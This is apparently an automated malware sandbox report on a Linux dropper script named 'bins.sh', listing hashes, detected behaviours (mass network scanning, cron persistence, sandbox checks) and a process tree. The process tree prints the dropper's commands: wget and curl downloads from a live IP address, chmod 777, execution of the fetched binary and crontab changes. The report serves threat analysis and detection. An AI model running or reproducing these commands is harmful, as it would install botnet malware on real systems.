Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 18:41
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
1bff584999b22d9de46e6deaafea9275
-
SHA1
efd709e5f86dd46ec4ec77ba703a641fbbbc5b6c
-
SHA256
4096659489b539ac00df12c2c960bb1c87cd7b1998118c549a4466cccb969e15
-
SHA512
e50cd035449bac71d40281310f9e20c6f8fa30bc7b586b890918eb8481c6e1dca4853d3353e0c54d9674f7040941278b65c9969ff25bb74473ca756099d8f8cc
-
SSDEEP
192:HImmkdESJRVe2tmuUUaTKamuUWJRVCmmkds:HImmkdESJRc2LaTKeJRkmmkds
Malware Config
Signatures
-
Contacts a large (2142) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 692 chmod -
Executes dropped EXE 1 IoCs
Processes:
CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYVioc pid process /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV 694 CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV -
Renames itself 1 IoCs
Processes:
CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYVpid process 695 CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.J9lcYP crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Processes:
CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYVdescription ioc process File opened for reading /proc/712/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/752/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1057/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1104/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/901/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/938/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1000/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1011/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/732/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1061/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1108/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/660/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/774/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/976/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1111/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/115/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/876/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/993/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/650/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/104/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/978/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/986/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/784/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/919/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/314/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1066/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/652/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/929/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1090/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/815/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/952/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/984/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/988/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/994/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1021/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/780/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/785/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/887/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/891/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/951/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/18/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/174/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1001/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1080/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/11/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/917/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1116/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/945/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1069/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1113/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/304/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/987/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1060/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1103/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/606/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/920/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/927/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/881/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/935/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1042/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/713/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/764/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1020/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/967/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetcurldescription ioc process File opened for modification /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV busybox File opened for modification /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV wget File opened for modification /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
/usr/bin/wgetwget http://216.126.231.240/bins/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Writes file to tmp directory
PID:657 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:682 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Writes file to tmp directory
PID:686 -
/bin/chmodchmod 777 CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- File and Directory Permissions Modification
PID:692 -
/tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV./CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:694 -
/bin/shsh -c "crontab -l"3⤵PID:696
-
/usr/bin/crontabcrontab -l4⤵PID:697
-
/bin/shsh -c "crontab -"3⤵PID:699
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:701 -
/bin/rmrm CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵PID:714
-
/usr/bin/wgetwget http://216.126.231.240/bins/r08YRx5AMJVQMmdbCM75UVt0H3zKz1SlAq2⤵PID:718
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD54ff0ae1bb8ac357b68757055d3d0c1a8
SHA1cb109725082482a7d9e48ddc4d650b49ebecb306
SHA256bfc648d37638a23fcdef70a3d631989c58a0dd760f747c2355404bf74a0150c0
SHA5127cb4bafc1c83f9375507cf80f94c32025ef1a1742aedc47e26e7802e4a7cf8a7af9e4e2739e3f1d52ac43ee2614ac0270ab214bcf37e57f31b08cc5070f8856c